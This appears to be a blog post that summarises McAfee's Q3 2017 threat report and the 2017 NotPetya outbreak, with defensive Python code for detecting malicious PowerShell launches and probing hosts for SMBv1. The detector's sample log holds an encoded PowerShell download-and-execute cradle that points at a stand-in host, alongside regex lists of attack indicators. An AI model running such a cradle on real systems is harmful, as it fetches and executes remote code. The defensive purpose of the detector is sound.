McAfee Labs’ Threat Report for Q3 2017 identifies 57.6 million new malware samples – an increase of 10% from Q2

McAfee, one of the leading cybersecurity companies, released its Threat Report for December 2017. The report covers the growth and trends in malware, ransomware and other cyber threats during Q3 2017.

According to the report's statistics, the new malware sample count in Q3 reached 57.6 million, an increase of 10% from Q2. With this, the total count in the McAfee Labs sample database has now passed 780 million. One likely reason for the increase is the ready availability of exploit kits and dark web sources.

“The third quarter revealed that attackers’ threat designs continue to benefit from the dynamic, benign capabilities of platform technologies like PowerShell, a reliable recklessness on the part of individual phishing victims, and what seems to be an equally reliable failure of organizations to patch known vulnerabilities with available security updates,” said Raj Samani, McAfee’s Chief Scientist.

Amongst industries, the health and public sectors were the worst affected, accounting for more than 40% of the total incidents.

Source: McAfee Labs Threat Report, December 2017

Account hijacking was the most common attack vector, followed by leaks, malware and DDoS.


Total mobile malware continued to grow, reaching 2.1 million samples, with a 60% increase in new mobile malware, probably driven by Android screen-locking ransomware.


Attackers continue to take advantage of known vulnerabilities, such as CVE-2017-0199 in Microsoft Office, which Microsoft patched in April 2017.

The report identified new variants of the Trickbot banking Trojan that embed the EternalBlue exploit, the same exploit behind the massive WannaCry and NotPetya ransomware attacks in Q2.

Even though Microsoft had patched the underlying SMBv1 vulnerability (MS17-010) in March 2017, attackers were able to combine this known vulnerability with other features such as cryptocurrency theft, making these Trickbot versions one of the most active banking trojans during Q3.

“The year 2017 will be remembered as the time when such vulnerabilities were exploited to orchestrate large-scale cyber events, including the WannaCry and NotPetya ransomware outbreaks, and high-profile breaches such as at Equifax,” said Steve Grobman, Chief Technology Officer at McAfee.

Fileless threats were also identified as a growing concern in Q3, including high growth in PowerShell malware (up 119%). The Emotet banking trojan was one of the most prominent fileless threats.
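To make the PowerShell observation concrete, here is an added example (not code from the McAfee report or from this page) of the kind of triage rule a SOC would run over process-creation events: it decodes `-EncodedCommand` payloads (base64 of UTF-16LE) and flags download cradles and launcher flags that hide intent. The log lines, the `example.test` URL and the scoring threshold are constructed for illustration, not taken from the report.

```python
import base64
import re

# Added example: a small triage rule for process-creation events that run
# PowerShell, the kind of "fileless" activity the report describes. Log lines,
# hostnames and URLs below are constructed for the example, not real telemetry.

# Common abbreviations PowerShell accepts for -EncodedCommand, followed by base64.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.I,
)

# Indicators seen in typical PowerShell download cradles and launchers.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "bypass_policy": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "embedded_base64": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
}


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Reverse encode_powershell(); return None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(line: str) -> dict:
    """Classify one process-creation log line carrying a CommandLine= field."""
    cmd = line.split("CommandLine=", 1)[-1]
    decoded = None
    m = ENCODED_FLAG.search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(1))
    # Match indicators against both the launcher arguments and the decoded payload.
    haystack = cmd + ("\n" + decoded if decoded else "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    # An encoded command is not malicious by itself, but it hides intent, so it weighs
    # like two indicators; a lone -ExecutionPolicy Bypass from an admin script stays benign.
    score = len(hits) + (2 if decoded is not None else 0)
    return {
        "command": decoded if decoded is not None else cmd,
        "encoded": decoded is not None,
        "indicators": hits,
        "score": score,
        "verdict": "suspicious" if score >= 3 else "benign",
    }


def analyse_log(lines):
    return [analyse(line) for line in lines]


# Constructed sample events (Sysmon/4688-style CommandLine fields).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage1.ps1')"
SAMPLE_LOG = [
    "CommandLine=powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_powershell(_CRADLE),
    'CommandLine="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    'CommandLine=powershell.exe -Command "Get-Process | Export-Csv C:\\temp\\procs.csv"',
]

if __name__ == "__main__":
    for r in analyse_log(SAMPLE_LOG):
        print(r["verdict"], r["score"], r["indicators"])
        print("   ", r["command"][:80])
```

The scoring deliberately keeps a plain `-ExecutionPolicy Bypass -File` launch benign, because that is what many legitimate admin scripts look like; it is the combination of a hidden window, no profile and an encoded download cradle that the rule treats as worth an analyst's attention.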

In the ransomware space, Lukitus, a new variant of the Locky ransomware, was distributed via more than 23 million spam emails within the first 24 hours of the campaign.

The research team at McAfee also found that the DragonFly 2.0 malware, discovered in early 2017, has affected organizations in sectors not previously made public, including pharmaceutical, accounting and financial services.

“The actors involved in the DragonFly 2.0 attacks have a reputation for initiating attacks for the purpose of conducting reconnaissance on the inner workings of targeted sectors—with energy and pharmaceutical confirmed as top priorities,” said Christiaan Beek, McAfee Lead Scientist and Principal Engineer.

Find the complete report here.



Increasing cyber-attacks – are we heading towards cyber doom?

The recent Petya ransomware outbreak that struck computer systems worldwide is the second large-scale ransomware attack in as many months, after WannaCry hit the world in May.

The attack hit many countries, locking up PCs and crippling enterprise services. Ukraine and Russia were identified as the worst affected countries.

Based on early findings from security firm Kaspersky, the ransomware could be a variant of Petya.D, Petya.A or PetrWrap; Kaspersky later concluded it was a new family, which it named ExPetr, rather than a true Petya variant. Though it spread widely across systems just as WannaCry did, it is not a WannaCry variant.

The ransomware encrypts the victim's files, overwrites the disk's master boot record and, after a reboot, displays a ransom note demanding $300 in Bitcoin.

The attack reportedly started through a compromised update to third-party Ukrainian accounting software known as MeDoc (M.E.Doc). The software is used by many organizations in the country, which is identified as the primary reason Ukraine was so heavily affected.

In Ukraine, government offices, banks, energy companies, cash machines, gas stations, railways, radiation monitoring systems at the Chernobyl plant and supermarkets were all impacted.

Many multinationals, including law firm DLA Piper, Mondelez International, Merck and shipping giant AP Moller-Maersk, were also impacted.

Per Kaspersky, about 60 percent of infections were in Ukraine and 30 percent in Russia.

The ransomware reportedly used the EternalBlue exploit against a vulnerability in Microsoft Windows' SMBv1 server (MS17-010), just as WannaCry did. Microsoft had issued the security update for it on March 14th, before either attack, so fully patched systems were not vulnerable to this spreading method. Unlike WannaCry, however, the malware also spread laterally by harvesting credentials from memory and reusing them over PsExec and WMI, so a single infected machine could still compromise patched hosts on the same network that shared administrative credentials.
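The EternalBlue detail above, like the Trickbot variants in the McAfee summary that embed the same exploit, makes "does this host still speak SMBv1?" the first question a defender should answer. The following is an added example (not code from McAfee, Kaspersky or this page) that sends an SMBv1 NEGOTIATE offering only the NT LM 0.12 dialect and reports whether the server accepted it; the reply bytes at the bottom are constructed so the parser can be exercised offline, and the host, port and header flag values are ordinary defaults rather than anything taken from the report.

```python
import socket
import struct

# Added example: a minimal SMBv1 exposure check. EternalBlue targets the SMBv1
# server (MS17-010), so a host that still answers an SMBv1 NEGOTIATE with a
# chosen dialect is one to patch or to disable SMBv1 on. Constructed replies at
# the bottom stand in for a live host so the parser can be exercised offline.

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
NO_DIALECT_ACCEPTED = 0xFFFF


def _smb1_header(command: int, flags: int = 0x18, flags2: int = 0xC853) -> bytes:
    """32-byte SMB1 header: magic, command, NT status, flags, flags2, PIDHigh,
    security signature, reserved, TID, PID, UID, MID."""
    return struct.pack("<4sBIBHH8sHHHHH", SMB1_MAGIC, command, 0, flags, flags2, 0,
                       b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)


def build_smb1_negotiate(dialects=(b"NT LM 0.12",)) -> bytes:
    """NetBIOS-framed SMB_COM_NEGOTIATE offering only SMBv1 dialects, so an
    SMB2-only server has nothing it can accept."""
    dialect_blob = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    body = struct.pack("<BH", 0, len(dialect_blob)) + dialect_blob   # WordCount=0, ByteCount
    smb = _smb1_header(SMB_COM_NEGOTIATE) + body
    return struct.pack(">I", len(smb)) + smb   # NetBIOS session message: type 0x00 + 24-bit length


def parse_negotiate_response(data: bytes):
    """Return (speaks_smb1, dialect_index) for a raw reply.

    SMBv1 enabled: SMB1 header, command 0x72, WordCount 17, DialectIndex = the
    accepted dialect (0xFFFF if none). SMBv1 disabled: the server usually drops
    the connection, or answers with an SMB2 header if it was offered SMB2 dialects.
    """
    if len(data) < 4 + 32 + 3:
        return False, None
    smb = data[4:]
    if smb[:4] == SMB2_MAGIC:
        return False, None
    if smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return False, None
    if smb[32] < 1:            # WordCount; need at least DialectIndex
        return False, None
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    return dialect_index != NO_DIALECT_ACCEPTED, dialect_index


def probe_smb1(host: str, port: int = 445, timeout: float = 3.0):
    """Live check against a host you administer; returns parse_negotiate_response()."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_smb1_negotiate())
            data = s.recv(4096)
    except OSError:            # refused, reset or timed out: no SMBv1 answer
        return False, None
    return parse_negotiate_response(data)


def constructed_reply(magic: bytes = SMB1_MAGIC, dialect_index: int = 0) -> bytes:
    """Constructed stand-in for a server reply (not a capture). WordCount 17
    matches a real SMBv1 NEGOTIATE response; only the magic and DialectIndex
    are inspected by the parser, so the remaining words are zero-filled."""
    header = struct.pack("<4sBIBHH8sHHHHH", magic, SMB_COM_NEGOTIATE, 0, 0x98, 0xC853, 0,
                         b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)
    words = struct.pack("<BH", 17, dialect_index) + b"\x00" * 32
    return struct.pack(">I", len(header) + len(words)) + header + words


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], probe_smb1(sys.argv[1]))
    else:
        print("smb1 host:", parse_negotiate_response(constructed_reply()))
        print("smb2-only:", parse_negotiate_response(constructed_reply(SMB2_MAGIC)))
```

Run it with a hostname to probe a machine on a network you own; run it with no arguments to see the parser's verdict on the constructed SMBv1 and SMB2-only replies. A host that reports `(True, 0)` still accepts the NT LM 0.12 dialect and should be checked for the MS17-010 update and, where nothing depends on it, have SMBv1 disabled outright.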

The lack of proper security measures and the failure to keep systems updated are cited as the major reasons behind the attacks.

Though security agencies and cyber-police have not found a way to decrypt the files, they have asked users to be more aware of the ransomware and its effects.

Later updates on the attack revealed that the attackers collected hardly any ransom; the single email address victims were told to contact was shut down by its provider within hours, so payment was effectively impossible. Some reports suggest that rather than being ransomware, it was a wiper whose primary aim was destruction: the "installation key" shown to victims is random data, so the files could not have been recovered even by the attackers.

With global cyber-attacks crippling the backbone of many countries, one is left wondering whether these are deliberate attempts by cyber criminals to extort money or whether there is some more sinister ulterior motive behind them.